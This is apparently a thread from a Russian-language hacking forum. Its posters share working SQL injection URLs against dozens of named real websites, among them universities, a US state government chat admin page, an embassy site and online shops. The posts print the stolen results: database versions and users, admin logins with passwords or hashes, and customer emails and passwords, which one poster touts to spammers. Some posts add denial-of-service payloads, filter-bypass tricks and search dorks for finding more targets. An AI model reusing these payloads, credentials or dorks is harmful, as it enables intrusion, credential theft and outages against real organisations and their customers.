http://www.cheryclub.org.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.mss-design.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.atyraunews.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.litinstitut.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://foto-push.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.99t.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://ww.moderni-talo.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.bia-team.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.photocapture.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.magellan.by/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.torzhok.info/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.aagu.org.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://ns64.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.blik-irk.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://fevralka.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.trust-building.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://mtt-mn.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.dancetrip.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.autoshoes.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://shelvergroup.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.jaray.org/home/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.laser-m.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.kvart-a.com.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://dizua.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://artdi.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://business.clarimondgroup.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc

Их там дофига (ГУГЛ)))) мне уже скучно стало подставлять)
Спасибо fobofob (http://forum.antichat.ru/member.php?userid=39781)

металлопрокат
http://www.akmmetal.md/?lang=ru&menu_id=248&gallery_id=
-1+union+select+1,2,3,concat_ws(0x2F,version(), database(),user()),5,6,7,8,9,10,11,12,13/*

5.0.27/17182/17182@localhost

http://www.bank-peresvet.ru/ - Банк "Пересвет"
http://www.bank-peresvet.ru/article2/52/**/and/**/ascii(lower(substring((select/**/table_name/**/from/**/information_schema.columns/**/where/**/column_name=0x6964/**/limit/**/1),3,1)))%3E107/*

Здесь катит только посимвольный перебор, версия mysql точно 5-ая, я начал перебирать имя первой таблицы, в которой есть колонка id, подобрал первые 2 символа ( дальше надоело ) - co , если кому интересно - копайте дальше...

http://www.artcifra.com/ - сайт разработчиков весьма неплохой CMS
http://www.artcifra.com/index.php?act=portfolio&subact=2&count=&id=-9+union+select+1,2,cast(concat(user_name,0x3a,user _password)+as+binary),4,5,6,7,8+from+4images_users +limit+2,1/*

User: timoshenkov_001@77.221.130.14
Version: 5.0.51-3-log
Administration: http://www.artcifra.com/admin
Login: goga
Password: 5971548

http://bolgaria.ru/ - посольство Болгарии в России
http://bolgaria.ru/news/index.php?id=-690'+union+select+1,2,3,concat(username,0x3a,passw ord),5,6,7,8+from+forums_auth/*

Version: 5.0.45
User: bulgaria@localhost

фэнам гонок needForSpeed ;)
http://www.sportcar-rm.ru/?p=1+union+select+concat_ws(0x2F,version(),%20data base(),user())/*

5.0.24-standard/db_sportcarrm1/sportcarrm1@localhost

http://livre.ru/change/index.php?id=0x3127%20union+select+1,2,concat_ws(0 x2F,version(),database(),user()),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24/*

4.1.22/links_exchange/linkuser@localhost


http://program.org.ua/index.php?cat=0x3127%20union+select+1,2,3,concat_w s(0x2F,version(),database(),user()),5,6,7,8,9,10,1 1,12/*

5.0.45-log/freeware/freeware@localhost


http://www.polkaudio.com/education/article.php?id=0x3127%20union+select+1,2,3,4,5,6,c oncat_ws(0x2F,version(),database(),user()),8,9/*

5.0.37/polk/webuser@localhost


http://www.pnevmo.ru/index.php?cat_id=1'%20union+select+1,2,3,4,5,6,con cat_ws(0x2F,version(),database(),user()),8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24/*

4.1.20-log/db_laaqer_3/dbu_laaqer_1@192.168.3.49

About
Flagstaff Gallery was established in Devonport in 1993 as the first dealer gallery on Auckland's North Shore.
http://www.flagstaff.co.nz/artists_detail.php?artists_id=1'+union+select+1,2, 3,4,5,6,version(),8/*

4.0.27-standard-log/flagstaff/w3_read@ws6.int.mydns.net.nz

xcedz пусть мне поставят минусы НО за*бал ! я тебе уже писал чтобы ты не писал идиотским шрифтом а тем более ещё более идиотским ЦВЕТОМ !!!!!
// извиняюсь за хамство //

http://www.murmanspas.ru/index.php?p=gallerypic&img_id=-666+union+select+1,2,3,version(),5,6,7,8,9/*&galid=32&church=1&ascdesc=desc
4.1.21

http://www.murmanspas.ru/index.php?p=gallerypic&img_id=-666+union+select+1,2,3,BENCHMARK(66666666666666666 6666666,BENCHMARK(100000,md5(current_time))),5,6,7 ,8,9/*&galid=32&church=1&ascdesc=desc
АДский смех
:D :D :D

http://www.hair-band.com/index.php?option=com_quiz&task=user_tst_shw&Itemid=47&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password)/**/from/**/mos_users/*

ЭТО был сайт провославной молодежи теперь он в заднице и не скоро от туда выбереться
Такие высказывания оскорбительны.. Держи свои мысли при себе! :mad:
к стате сайт норм работает :p
===================================
xcedz пусть мне поставят минусы НО за*бал ! /
ответ: Заe-aл не выe-aл = потерпишь .
/извини за хамство/ на счет "идиотских" шрифтов и "тем более идиотского цвета" это вопрос не ко мне ... так настроен форум есле ты не в курсе :D
===================================
по теме
http://www.ikointl.com/pro_career.php?menu_id=-2222'+union+select+1,2,concat_ws(0x2F,version(),da tabase(),user()),4/*

5.0.45-log/ikointl_main/ikointl@localhost

-2222'+union+select+1,2,concat(admin,char(58),passw ord),4+from+admin/* ;)
admin:123!$

ПР-7 вроде.

http://www2.umaine.edu/graduate/article.php?id=-63'+union+select+1,concat_ws(0x3A3a,username,passw ord),3,4+from+users+limit+0,1/*

Пассы расшифровываются, но к админке не подходят.

_http://maps.mail.ru/msk/route.asp?tr1='/*&tr2='/*

Это не sql инъекция Ругается на любой символ. Кавычки тут вообще не причем, они фильтруются.

http://www.viking.tm/product.php?id=-91+union+select+1,table_name,3,4,5,6,7+from+inform ation_schema.tables--
Картинки надо вырубать

http://www.ac.org.tr/news.php?id=0x3127%20union+select+1,2,concat_ws(0x 2F,version(),database(),user()),4,5,6,7/*

5.0.45-log/avrasya/acdbuser@cgi0703.int.bizland.net


http://www.lybid-realty.com.ua/index.php?w=new&id=0x3127%20union+select+1,2,3,concat_ws(0x2F,vers ion(),database(),user()),5/*

4.1.22/lybidrealty/u_lybidrealt@localhost


http://enazindan1kisi.com/news.php?id=0x3127%20union+select+1,2,3,concat_ws( 0x2F,version(),database(),user()),5/*

5.0.45-community/enazinda_v1/enazinda_v1@localhost


http://italia.allaboutjazz.com/php/news.php?id=0x3127%20union+select+1,2,3,concat_ws( 0x2F,version(),database(),user()),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19/*

4.1.20/italy/vxweb@jazzy


http://www.architectureforhumanityitaly.org/news.php?id=0x3127%20union+select+1,2,3,4,concat_w s(0x2F,version(),database(),user()),6,7,8,9/*

5.0.45-community-log/Sql85662_1/Sql85662@62.149.140.140

http://nodel.org/events.php?ID=-1%2527%2520+union+select+1,2,3,4,5,6,7,8,TABLE_NAM E,1,2,3,4,5,6,7+from+information_schema.tables+lim it+1,1--

http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,CONCAT(user(),version(),databas e())--

впервые вижу
http://www.multifamilyassessment.net/index.php?p=g&id=-1+union+select+1,version()/*

вывод типа ****.php
Warning: main(4.0.24_Debi.php): :D

впервые вижу
http://www.multifamilyassessment.net/index.php?p=g&id=-1+union+select+1,version()/*

вывод типа ****.php
Warning: main(4.0.24_Debi.php): :D
Гг php include через sql инъекцию :) Я и покруче видел, у меня в эксплоите для jportal исполнение кода через mysql inj

www.rus-waphost.ru
Хостер ппц) 4 админа там и они все тупые :D

http://rus-waphost.ru/news/komm.php?ides=1'%20union+select+1,2,concat_ws(0x3a ,version(),user(),database()),4,5/*

5.0.45:admin_news@localhost:admin_new

uabest.net
http://uabest.net/mobile/download.php?jgid=-47+union+select+1,2,3,4,5,6,7,8,9/*
version() 5.0.37-log
user() uabest_best@localhost
database() uabest_uabest

maxpaintball.ru
http://www.maxpaintball.ru/show_cat2.php?grid=-2+union+select+concat(version(),0x3a,user(),0x3a,d atabase())
version() 4.0.27-max-log
user() maxpain3_shop@v22.valuehost.ru
database() maxpain3_shop
http://www.maxpaintball.ru/show_cat2.php?grid=-2+union+select+concat(username,0x3a,email,0x3a,pas swd)+from+user+where+username+like+1013
1013:Boikov@rbr.ru:697423ce62550904

hwdecor.ru
http://hwdecor.ru/show_cat2.php?grid=-5+union+select+concat(version(),0x3a,user(),0x3a,d atabase())/*
version() 4.0.27-max-log
user() effa112_shop@v48.valuehost.ru
database() effa112_shop

christcollege.edu
http://www.christcollege.edu/progdetails.php?prid=-51+union+select+1,2,3,4/*
version() 4.1.20
user() christco_christ@localhost
database() christco_christcollege

pseb.org.pk
http://www.pseb.org.pk/page.php?prid=-39+union+select+1,2,3,4
version() 5.0.45-community-log
user() pseborg_newpseb
database() pseborg_pseb@localhost
http://www.pseb.org.pk/page.php?prid=-39+union+select+1,2,table_name,4+from+information_ schema.tables
вывод данных идёт в цикле, поэтому лимитом не нужно пользоваться)

wildplanet.com
http://www.wildplanet.com/press/wp_release_single.php?prid=-56+union+select+1,concat(version(),0x3a,user(),0x3 a,database()),3,4,5,6,7,8
version() 5.0.24
user() outsideuser@localhost
database() NewSite
http://www.wildplanet.com/press/wp_release_single.php?prid=-56+union+select+1,concat(id,0x3a,username,0x3a,pas sword),3,4,5,6,7,8+from+WPUser+limit+0,1
1:mseltzer:B%BB0%27VG%89%F6sw%97%FF%88%19%0CI
2:digibrew:UP%E5%CDlOQ%BEUP%E5%CDlOQ%BE
3:wildplanet:%EF%EF%A7%D45%5B%3B%DEb%1F2%AFM%9C%B0 %BC
4:mthomas:ty%19zv%E5Z-WR%1F%CC%D6%03%F9%98
5:tboeger:.%FE%99%B5%08%15%B1y%E1%BF%9F%06%05%9Ba% C3
9:martin:%2A%FA%AB%2FWen%1F%24%F6%D2%C1%28%3ASh
так я и не понял, чем зашифрованы пассы=/
http://wildplanet.com/admin - админка


gamingtrend.com
http://www.gamingtrend.com/PressReleases/index.php?PRID=-99999+union+select+1,concat(version(),0x3a,user(), 0x3a,database()),3,4,5,6,7
version() 5.0.45-community
user() knight_tigg3rpig@localhost
database() knight_consolegold
http://www.gamingtrend.com/PressReleases/index.php?PRID=-99999+union+select+1,2,concat(username,0x3a,passwo rd),4,5,6,7+from+Users
DarkEl:32i692acrncR.
AgtFox:DELETED
Knightshade:32CcfdIVkoDRw
PJ_phildo:DELETED

так я и не понял, чем зашифрованы пассы=/


Скорее всего, это пресловутый md5 в виде бинарной строки...
Сначала надо сделать urldecode(), а затем,
чтобы привести в привычный вид, надо сделать bin2hex()

http://www.barefeetshoes.com/cls/index.php?method=showdetails&list=advertisement&rollid=-3386'+union+select+1,2,3,USER(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,DATABASE()%20 from%20classifieds_advertisement%20where%20id='338 6'/*

VERSION(): 5.0.45-community-log
USER(): barefeet_office1@localhost
DATABASE(): barefeet_clss2

пример запроса для DoS:

http://www.barefeetshoes.com/cls/index.php?method=showdetails&list=advertisement&rollid=-3386'+union+select+1,2,3,BENCHMARK(10000000,BENCHM ARK(10000000,md5(current_date))),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,title%20from %20classifieds_advertisement%20where%20id='3386'/*

Che-guevara/Эрнесто Че Гевара ;)

http://www.che-guevara.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc

4.1.22-standard/forexmol_cheguv@localhost/forexmol_cheguv


www.aqualang.ru

http://www.aqualang.ru/index.php?cat_id=1'%20union+select+1,2,concat_ws(0 x3a,version(),user(),database()),4,5,6,7,8,9,10,11 ,12/*

5.0.45-communitylog:mh3spea_vallwww@localhost:mh3spea_aqu alang

http://www.elblogdegloria.com/verblog.php?ID=0x3127%20union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5,6/*
4.1.22-standard-log:gloria_admin@localhost:gloria_gloria


Просто так)

http://www.ria-alliance.com.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.altsport.metroland.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.gynku.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.extremal.am/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://atyraunews.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc

http://www.dotfiles.com/index.php?cat_id=-6+union+select+concat_ws(0x3a,user,password)+from+ mysql.user/*


root:259010f859aea03d

Не бейте пожалуйста,люди,если уже было...просто очень хочу спать....

http://www.bis7.ru/- Сумки мать их...


http://www.bis7.ru/index.php?prid=-10+union+select+1,concat_ws(0x3a,name,passwd)+from +users/*

administrator:afina

P.S: А вот где админка хз ггггг)))

http://www.williamsontea.com/Pressrelease/index.php?prid=-22+union+select+1,2,,4,5,6+from+customer/*

Ели еле подобрал таблицу, до полей руки не доходят...спать....хррр хррр...

administrator:afina

P.S: А вот где админка хз ггггг)))/v_2/

ссылка на прайс-лист: http://www.bis7.ru/v_2/database/file.php?table=price&field=price_file&id=1
можно отредкатировать запрос так что бы выдовал логин и пасс в названии файла скачивания.
доступна дериктория: http://www.bis7.ru/v_2/database/

пример запроса для DoS:





А разве бенчмарк пашет на версиях выше третьей ?

Прошу прощения,провтыкал.

5.0.37-log

http://www.big6.com/showarticle.php?id=-16+union+select+concat_ws(0x3A3a,username,user_pas sword,user_id,user_email),2,3,4,5+from+big6_users+ limit+0,1/* было (http://forum.antichat.ru/showpost.php?p=589369&postcount=4789)
http://www.moac-info.net/index3.php?region_c=4'+union+select+1,2,3,@@versio n,5,6,7,8,9--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.moac-info.net/index3.php?region_c=4'+union+select+1,2,3,user_log in,5,6,7,8,9+from+tbluser--
http://www.moac-info.net/index3.php?region_c=4'+union+select+1,2,3,user_pas sword,5,6,7,8,9+from+tbluser--

http://dolliedoll.nl/?page_id=6&album=antichat&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201

|admin|32ea785b98717e08d73289eee9c6348c|

:D

http://www.globalwaterfoundation.org/news.php?id=0x3127%20union+select+1,2,concat_ws(0x 2F,version(),database(),user())/*

5.0.37-community-log/globalwaterfoundation_org_-_1/globalwater@web2.4what.net


http://www.nejdanov.ru/article.php?id=0x3127%20union+select+1,concat_ws(0 x2F,version(),database(),user()),3,4,5,6/*

5.0.45-community-log/capinfor_news1/capinfor_adm@localhost

http://www.nishmat.net/article.php?id=0x3127%20union+select+1,2,3,concat_ ws(0x2F,version(),database(),user()),5,6,7,8,9,10, 11/*
4.1.20-log/nishmat_nishmat/nishmat_2@209.68.2.111


http://www.flagman.kiev.ua/pub/view.php?pid=0x3127%20union+select+1,2,3,4,concat_ ws(0x2F,version(),database(),user()),6,7,8,9,10/*

4.1.22/flagman/u_flagman@localhost

secure.in.gov
https://secure.in.gov/phplive/admin/traffic/knowledge_searchm.php?l=staff&x=1&action=expand_question&questid=2-61+union+%20all+select+1,2,3,4,5,6,concat(login,ch ar(58),password),8+from+chat_admin--&deptid=2&catid=1&keyword=YOU HACKED BY KAIR
lwilliams:c39c09989de954e6824ecacb10590e3e
mbranson:c39c09989de954e6824ecacb10590e3e
dwilson:c39c09989de954e6824ecacb10590e3e
tprince:c39c09989de954e6824ecacb10590e3e
randerson:c39c09989de954e6824ecacb10590e3e
clawver:c39c09989de954e6824ecacb10590e3e
tjones:c39c09989de954e6824ecacb10590e3e
gswallow:c39c09989de954e6824ecacb10590e3e
aalbsmeyer:c39c09989de954e6824ecacb10590e3e

nick:charper
c39c09989de954e6824ecacb10590e3e: egov
АДМИНКА
https://secure.in.gov/phplive/index.php?winapp=0&e=2

c11.chatsupportlive.com
http://c11.chatsupportlive.com/admin/traffic/knowledge_searchm.php?l=refreshchat&x=129&action=expand_question&questid=111+union+all+select+1,2,3,4,5,6,
concat(login,char(58),password),8+from+chat_admin--&deptid=2&catid=1&keyword=a8&deptid=218&catid=44&keyword=

secure.in.gov

nick:charper
c39c09989de954e6824ecacb10590e3e: egov
АДМИНКА
https://secure.in.gov/phplive/index.php?winapp=0&e=2

c11.chatsupportlive.com

google dork : Powered by PHP Live! v3.2.1 Possible ?

Good :)

http://www.kvn.com/attorneys_bio.php?id=-1%2527+union+select+1,table_name,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0+from+information_schema.tables--

http://www.lawssd.com/attorneys_bio.php?id=-12%2527+union+select+1,2,3,TABLE_NAME,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schem a.tables--

http://www.somachlaw.com/attorneys_bio.php?id=-13%2527+union+select+1,2,3,TABLE_NAME,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schem a.tables--
Кто нить знает как движок назывыается ?

http://www.somachlaw.com/attorneys_bio.php?id=-13%2527+union+select+1,2,3,TABLE_NAME,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schem a.tables--
Кто нить знает как движок назывыается ?
Похош на самаписный имхо...

не ето не самописный точно если в гугле вбить inurl:"attorneys_bio.php" то он выдаст линков 20 и почти у всех будет скуля

http://worldnetdaily.com/index.php?fa=PAGE.view&pageId=999999+union+select+1,2,concat(version(),0x 3a,user(),0x3a,database()),4,5,6,7/*
5.0.22-log:wndMysqlUser@pr-01:wndNew

http://worldnetdaily.com/index.php?fa=PAGE.view&pageId=999999+union+select+1,2,concat(userId,char( 58),password),4,5,6,7+from+user_users/*
1:530a14617895ab8725760a2a401162b4

lawnmower :)
==================================================
http://www.fireworkszone.com/index.php?root=39&extension=&idChapitre=47+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,concat(version(),0x203a,user(),0x3a,database() ),14,15,16,17,18,19,20/*
4.1.11-Debian_4online1-log
:fireworkszonecom@212.27.35.49:fireworkszonecom

ндя idchapitre= вот он враг :D

гуголь нашел еще 5 сайтов 4 оказались уязвимы... поищем еще ;)

http://www.ufo.com.br/bonus.php?id=-8+union+select+1,2,version()+admin/*

http://www.menestrersgascons.com/francais/groupesmusicaux/bonus.php?id=-5+union+select+1,2,VERSION(),4,5,6,7,8,9/*

http://www.kujtesa.com/bs.php?id=-33+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12 ,13,14/*

http://fxibank.com/index.php?menu_id=0x3235+union+select+concat(versi on(),0x3a,user(),0x3a,database())/*


4.1.21 fxintegralbank@localhost:fxintegralbank :) дерзайте други

Mambo component Portfolio Manager 1.0

http://www.inta.org/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*

(c) it's my

http://www.goadirondack.com/menu_page.php?menu_id=-1+union+select+1,2,3,4,concat(version(),0x3a,user( ),0x3a,database()),6/*

4.0.16-max-nt:001402@localhost:001402

http://www.multim.org/index.php?section=cours_affiche_session&vchParam=1'+union+select+1,concat(version(),0x3a,u ser(),0x3a,database()),3,4,5,6,7,8,9/*
5.0.32-Debian_7etch5-log:multim_www@localhost:multim_www

вот парочка ЕДУшек с ПР=6 =)

_http://experts.uchicago.edu/experts.php?id=99999+union+select+1,2,3,4,VERSION( ),6,USER(),DATABASE(),9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42/*
вручную подбирал =)

_http://wandp.american.edu/pages.php?ID=99999+union+select+1,2,3,4/*
тут чет непонятное...

http://www.thedietplate.us/products.php?cat=-99991%2527%2520+union+select+version()/* 4.1.22-standard

еще один:
_http://lapa.princeton.edu/peopledetail.php?ID=99999+union+select+1,2,3,4,VER SION(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39/*

во, уже пятая версия мускула :) :
_http://www.geology.ohio-state.edu/faculty_bios.php?id=99999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31/*

2 x88x
почему не понятно всё нормально

_http://wandp.american.edu/pages.php?ID=-5+union+select+1,aes_decrypt(aes_encrypt(user,0x71 ),0x71),aes_decrypt(aes_encrypt(password,0x71),0x7 1),4+from+mysql.user/*
root
*ADDF07FCC8E37371B887F38314C77A2FA4BC71CE

_http://wandp.american.edu/pages.php?ID=99999+union+select+1,2,3,4/*
тут чет непонятное...
Обход фильтрации -
http://wandp.american.edu/pages.php?ID=99999+union+select+1,2,convert(concat (USER(),0x3a,VERSION(),0x3a,DATABASE())+using+lati n1),4/*

PR-6.

http://www.ochenk.com/entry.php?id=-63+union+select+1,concat_ws(0x3A3a,version(),datab ase(),user()),3,4/*

Ничего больше сделать не пробывал, ибо лень)) Там уж сами... кому надо, тот сделает))
Просто нашел скулю и решил выложить))
Удачи...

http://www.warcraftrealms.com/census.php?serverid=-298+union+select+table_name,2+from+information_sch ema.tables/*

http://www.warcraftrealms.com/census.php?serverid=-298+union+select+column_name,2+from+information_sc hema.columns/*

http://www.attcottonbowl.com/news_room/releases.php?uid=-165'+union+select+1,2,3,4,5,6,7,concat(version(),0 x3a,user(),0x3a,database()),9,10,11,12,13,14,15,16/*
______________________________
4.1.20:cottonbowl@localhost:cottonbowl

http://www.asf.ur.ru/index1.php?id=60&action=getviewclickedlink&uid=-1+union+select+concat(version(),0x3a,user(),0x3a,d atabase())/*

при потыке узнать версию выкидывает со странички
сюда http://5.0.41-log/ :D
Зы typo3.... ошибка в class.tx_cmwlinklist_pi1.php

brassmedia.com
http://www.brassmedia.com/press/?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user( ),database()),5,6,7,8,9,10,11,12,13/*
5.0.22brass@172.20.0.31brass_media
http://www.brassmedia.com/press/?id=-1+union+select+1,2,3,concat_ws(0x3,user_id,first_n ame,last_name,password),5,6,7,8,9,10,11,12,13+from +brass_magazine.brasscu_user_accounts/*
1fastbee@centurytel.netfrederickbrozyna jrhardrunner
http://brassmedia.serveftp.net/index.asp

http://ugo.com.br/secoes_news_completo.php?codigo=11+union+select+1, 2,3,4,5,6,7,8/*
4.1.9
-----------------------------------------------------
http://www.chiangmainews.com/ecmn/viewfa.php?id=-1650+union+select+1,2,3,4,5,table_name,7,8,9,0,1+f rom+information_schema.tables/*
5.0.24a-standard-log
-----------------------------------------------------
http://sify.com/astrology/fullstory.php?id=-14166076+union+select+0,2,3,password,5,6,7,8,9,0,0 ,2,3,4,5,6,7,8+from+users/*
4.0.18-log
логин не нашёл
пасс:s0o2r3z
-----------------------------------------------------
http://www.philadelphiaweekly.com/view.php?id=8261+union+select+1,2,3,4,5,6,convert( version(),binary),8,9,0,1,2,3,4,5,6+from+users/*
4.1.12-STANDARD
-----------------------------------------------------
http://www.newsocialist.org/index.php?id=-1321+union+select+1+from+users/*
4.0.27-standard-log

http://sify.com/astrology/fullstory.php?id=-14166076+union+select+0,2,3,password,5,6,7,8,9,0,0 ,2,3,4,5,6,7,8+from+users/*
4.0.18-log
логин не нашёл
пасс:s0o2r3z
http://sify.com/astrology/fullstory.php?id=-14166076+union+select+0,7,3,concat(userid,0x3,pass word),5,6,7,8,9,0,0,2,3,4,5,6,7,8+from+users/*
akbar_babars0o2r3z
моть быть этот

http://www.drawger.com/robd/?section=gallery&gallery_id=-633'+union+select+1,2,3,concat(version(),0x3a,user (),0x3a,database()),5/*
_____________________________
4.1.22-log:draw@localhost:drawger
_____________________________
таблички:
-633'%20union+select+1,2,3,4,5+from+contacts/*
-633'%20union+select+1,2,3,4,5+from+links/*
-633'%20union+select+1,2,3,4,5+from+users/*
____________________________
мыло zimm@drawger.com
=========================
http://www.flagstaff.co.nz/artists_detail.php?artists_id=-64'%20union+select+1,2,3,4,5,6,version(),8/*
=========================
4.0.27-standard-log
_______________________________
http://www.shinshy-records.com/subpages/artists_id.php?lang=es&myId=-2+union+select+1,2,3,password,5+from+users/*
странно 246061
____________________________

Хыы я для спамера просто золотая жила свежих мыльников вот вам собираем карочь базы огромные просто (не везде конечно но много в основном)
http://www.amenbeads.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.wallables.com/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://kissedbyangels.com/oscommerce/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.chibabogu.com/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.dvbhardware.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.diggorypress.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.foreverpets.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
